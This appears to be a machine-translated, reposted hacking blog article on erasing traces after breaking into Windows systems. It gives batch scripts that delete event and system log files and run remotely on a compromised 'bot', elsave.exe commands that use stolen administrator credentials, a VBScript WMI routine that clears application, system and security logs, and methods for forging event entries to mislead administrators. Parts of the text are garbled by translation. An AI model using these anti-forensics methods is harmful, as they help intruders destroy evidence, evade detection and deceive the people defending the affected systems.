Intrude into the system and wipe your footprints

Article from http://hi.baidu.com/lixinbo0216/item/3cd9a4f37f1fe814d6ff8ca0

Intrude into the system and wipe your footprints

After successful system intrusion, the first thing is to clear logs and erase your own traces. You can use the following two methods: First, write your own batch files to solve the problem, writing a batch that can clear logs is very simple by creating a new batch file with the following content:

@ Del c: \ winnt \ system32 \ logfiles \*.*
@ Del c: \ winnt \ system32 \ config \ *. EVT
@ Del c: \ winnt \ system32 \ dtclog \*.*
@ Del c: \ winnt \ system32 \ *. Log
@ Del c: \ winnt \ system32 \ *. txt
@ Del c: \ winnt \ *. txt
@ Del c: \ winnt \ *. Log
@ Del c: \ del. bat

Save the preceding content as del. bat. In the above Code, ECHO is the echo command under DOS, and the prefix "@" is added before it, indicating that the line is not displayed in the command line or DOs during execution, in addition, do you know the del command? It is a command to delete files.

Next, create a new batch file with the following content:

@ Copy del. BAT \ % 1 \ C $
@ ECHO: Copy del. bat from the local bot ...... OK
@ Export xec \ % 1 c: \ del. bat
@ Echo run del. bat on the bot to clear the log file ...... OK

Save it as clean. bat. If you have already connected to the bot via IPC, enter "clean. Bat" ip address under cmd to clear the log files on the bot.

A third-party software, such as elsave.exe, is a software that can remotely clear system logs, application logs, and security logs. Elsave.exe is easy to use. First, use the obtained Administrator Account to establish an IPC session with the other party: net use \ IP pass/User: User. Then, run the following command on the command line: elsave-S \ IP-l Application-C to delete the security log.

------------

1. Days to clear
The first thing a hacker can do after a successful system intrusion is to clear logs. It is not difficult to delete logs if the hacker remotely controls the other machine on the GUI or logs in from the terminal, although logs are also run as a service, but unlike services such as HTTP and FTP, logs can be stopped and deleted in the command line, using net stop EventLog in M command line cannot be stopped, so some people think it is very difficult to delete logs in command line. In fact, this is not the case. The following describes several methods:
1. using third-party tools: for example, the elsave.exe remote clearing of system, applicaton, and security software is easy to use. First, use the obtained Administrator Account to establish an IPC session with the other party. net use \ IP pass/User: user
Then run elsave-S \ IP-l Application-C on the command line to delete the security log.
In fact, this software can also be used to back up logs. You only need to add a parameter-f filename, which will not be detailed here.
2. Using the VMI in Script Programming, you can also delete logs. First, you can obtain the object and then use its cleareventlog () method to delete logs. Source code:
Cleanevent. vbs
Strcomputer = "."
Set ob1_miservice = GetObject ("winmgmts :"_
& "{Impersonationlevel = impersonate, (Backup )}! \\"&_
Strcomputer & "\ Root \ cimv2 ")
Dim mylogs (3)
Mylogs (1) = "application"
Mylogs (2) = "system"
Mylogs (3) = "security"
For each logs in mylogs
Set collogfiles = obw.miservice. execquery _
("Select * From win32_nteventlogfile where logfilename = '" & logs &"'")
For each objlogfile in collogfiles
Objlogfile. cleareventlog ()
Next
Next
In the code above, create an array, which is application, security, and system. If there are other logs, you can add the array.
Then, use a for loop to delete each element in the array, that is, each log.
2. Create log:
After deleting the log, any thoughtful administrator will immediately respond to the empty log and be intruded. So how can a smart hacker learn?
Counterfeit logs:
1. Using the EventLog method in Script Programming makes it very easy to create logs. Let's take a look at the code below.
Createlog. vbs
Set Ws = wscript. Createobject ("wscript. Shell ")
WS. logevent 0, "Write log success" 'create a successful execution log
This code is easy to read. first obtain a shell object of wscript, and then use the logevent method of the shell object.
Logevent usage: logevent eventtype, "Description" [, remote system]
Eventtype is the log type. The following values can be used: 0 indicates successful execution, 1 indicates execution error, 2 warning, 4, information, 8 indicates successful audit, 16 indicates failure audit.
So in the code above, you can change 0 to 1, 2, 4, 8, or 16. The log description is enclosed in quotation marks.
The log written in this method has one disadvantage: it can only be written to application logs, and the log source can only be wsh, that is, Windows Scripting host. Therefore, it cannot be concealed too much.
Microsoft provides a new command line tool, eventcreate.exe, for system administrators and programmers. It is easier to create logs by using it.
Eventcreate-S server-l LOGNAME-u username-P password-So source-T eventtype-ID-D description
Meaning:-s creates logs for the remote host:-u remote host user name-P remote host User Password
-L log; System and Application can be created, and security logs cannot be created,
-So log source, which can be any log-T log type such as information Information, error, warning,
-D log description, which can be any statement-the ID of the independent log is within 1-
For example, we want to create a local system log. The log source is admin, the log type is warning, the description is "this is a test", and the event ID is 500.
The following parameters can be used:
Eventcreate-L system-So administrator-T warning-d "this is a test"-ID 500

# Online report browsing (25) reposted comments